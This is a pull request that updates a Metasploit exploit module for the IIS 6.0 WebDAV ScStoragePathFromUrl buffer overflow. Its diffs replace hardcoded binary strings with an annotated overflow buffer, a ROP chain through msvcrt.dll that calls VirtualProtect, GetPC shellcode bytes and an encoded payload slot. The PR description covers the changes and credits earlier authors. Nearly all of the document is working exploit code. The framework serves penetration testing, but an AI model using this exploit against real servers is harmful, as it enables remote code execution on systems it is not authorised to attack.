### PR TITLE
iis_webdav_scstoragepathfromurl: Updated module removing hardcoded binary payload strings

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -157,6 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
     return str.force_encoding('UTF-16LE').encode('UTF-8')
   end
 
+  #filler chars to be encoded
+  def make_junk(len)
+    return utf_encode_str(rand_text_alpha(len))
+  end
+
   def exploit
     # extract the local servername and port from a PROPFIND request
     # these need to be the values from the backend server
@@ -189,28 +194,28 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         buf1 = "<#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 16)
+        buf1 << make_junk(32)
         #survive SHR instruction 0x02020202
         buf1 << utf_encode_str([0x02020202].pack('V'))
         #str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation
         buf1 << utf_encode_str([0x680312c0].pack('V'))
-        buf1 << utf_encode_str(junk * 20)
+        buf1 << make_junk(40)
         #0x680313c0 -> destination pointer used with memcpy
         buf1 << utf_encode_str([0x680313c0].pack('V'))
         buf1 << ">"
         buf1 << " (Not <locktoken:write1>) <#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 14)
+        buf1 << make_junk(28)
         #0x680313c0  -> pointer to call itself at same address for vtable call
         buf1 << utf_encode_str([0x680313c0].pack('V'))
         #ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain
         #msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN
         buf1 << utf_encode_str([0x77bdf38d].pack('V'))
-        buf1 << utf_encode_str(junk * 4)
-        #0x680313c0 -> vtable pointer passed to EAX for [call eax +24]
+        buf1 << make_junk(8)
+        #0x680313c0 -> vtable pointer passed to EAX for call [eax +24]
         #point to itself at [eax]
         buf1 << utf_encode_str([0x680313c0].pack('V'))
-        buf1 << utf_encode_str(junk * 8)
+        buf1 << make_junk(16)
         #ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX
         #which also points to new ESP
         buf1 << utf_encode_str([0x68016082].pack('V'))

--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -189,8 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
     min_path_len.upto(max_path_len) do |path_len|
       vprint_status("Trying path length of #{path_len}...")
 
-      junk = rand_text_alpha(2)
-
       begin
         buf1 = "<#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)

--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
         'firefart', # metasploit module
         'zcgonvh <zcgonvh@qq.com>', # metasploit module
-        'Rich Whitcroft' # metasploit module
+        'Rich Whitcroft', # metasploit module
+        'Lincoln' # minor updates to metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -112,6 +113,50 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  # corelan.be
+  # rop chain generated with mona.py
+  def create_rop_chain()
+
+    rop_gadgets =
+      [
+        #MSVCRT.dll - all Windows 2003
+        0x77bcb06c, # POP ESI # RETN
+        0x77bef001, # Write pointer # Garbage
+        0x77bb2563, # POP EAX # RETN
+        0x77ba1114, # <- *&VirtualProtect()
+        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+        0x41414141, # junk
+        0x77bbee22, # XCHG EAX,ESI # ADD BYTE PTR DS:[EAX],AL # RETN
+        0x77bc9801, # POP EBP # RETN
+        0x77be2265, # ptr to 'push esp #  ret'
+        0x77bb2563, # POP EAX # RETN
+        0x03C0946F,
+        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
+        0x77bb48d3, # POP EBX, RET
+        0x77bf21e0, # .data
+        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
+        0x77bbfc02, # POP ECX # RETN
+        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
+        0x77bd8c04, # POP EDI # RETN
+        0x77bd8c05, # ROP NOP (-> edi)
+        0x77bb2563, # POP EAX # RETN
+        0x03c0944f,
+        0x77bdd441, # SUB EAX, 03c0940f
+        0x77bb8285, # XCHG EAX,EDX # RETN
+        0x77bb2563, # POP EAX # RETN
+        0x90909090, # nop
+        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
+      ].pack("V*")
+
+    return rop_gadgets
+  end
+
+  #encode string as UTF-8 char format that when converted to UTF-16LE
+  #will represent chars we want in memory
+  def utf_encode_str(str)
+    return str.force_encoding('UTF-16LE').encode('UTF-8')
+  end
+
   def exploit
     # extract the local servername and port from a PROPFIND request
     # these need to be the values from the backend server
@@ -139,14 +184,41 @@ class MetasploitModule < Msf::Exploit::Remote
     min_path_len.upto(max_path_len) do |path_len|
       vprint_status("Trying path length of #{path_len}...")
 
+      junk = rand_text_alpha(2)
+
       begin
         buf1 = "<#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
+        buf1 << utf_encode_str(junk * 16)
+        #survive SHR instruction 0x02020202
+        buf1 << utf_encode_str([0x02020202].pack('V'))
+        #str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation
+        buf1 << utf_encode_str([0x680312c0].pack('V'))
+        buf1 << utf_encode_str(junk * 20)
+        #0x680313c0 -> destination pointer used with memcpy
+        buf1 << utf_encode_str([0x680313c0].pack('V'))
         buf1 << ">"
         buf1 << " (Not <locktoken:write1>) <#{http_host}/"
         buf1 << rand_text_alpha(114 - path_len)
-        buf1 << "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"
+        buf1 << utf_encode_str(junk * 14)
+        #0x680313c0  -> pointer to call itself at same address for vtable call
+        buf1 << utf_encode_str([0x680313c0].pack('V'))
+        #ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain
+        #msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN
+        buf1 << utf_encode_str([0x77bdf38d].pack('V'))
+        buf1 << utf_encode_str(junk * 4)
+        #0x680313c0 -> vtable pointer passed to EAX for [call eax +24]
+        #point to itself at [eax]
+        buf1 << utf_encode_str([0x680313c0].pack('V'))
+        buf1 << utf_encode_str(junk * 8)
+        #ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX
+        #which also points to new ESP
+        buf1 << utf_encode_str([0x68016082].pack('V'))
+        buf1 << utf_encode_str(create_rop_chain)
+        #GetPC # push esp; pop esi; add esi, 10
+        buf1 << utf_encode_str("\x54\x5e\x83\xc6")
+        #GetPC ESI +10 plus encode alignment
+        buf1 << utf_encode_str("\x0a\x41")
         buf1 << payload.encoded
         buf1 << ">"
 


### PR DESCRIPTION
- Used only nessessary pointers needed for exploit to work removing junk/filler chars
- Repaced ROP chain with generic from msvcrt (even though original was beautiful and smaller, uses hardcoded pointers for leave instructions)
- Cannot use ropdb since 4 byte junk char during generation may result in InvalidByteSequenceError during UTF conversion
- It's been some years since my last pull request...so I might be a bit rusty to new Metasploit standards (please forgive me!)

Lastly, a lot of work was done from @dmchell, @rwhitcroft, @zcgonvh, and @FireFart. I just wanted to add some minor modifications leveraging their hard work.

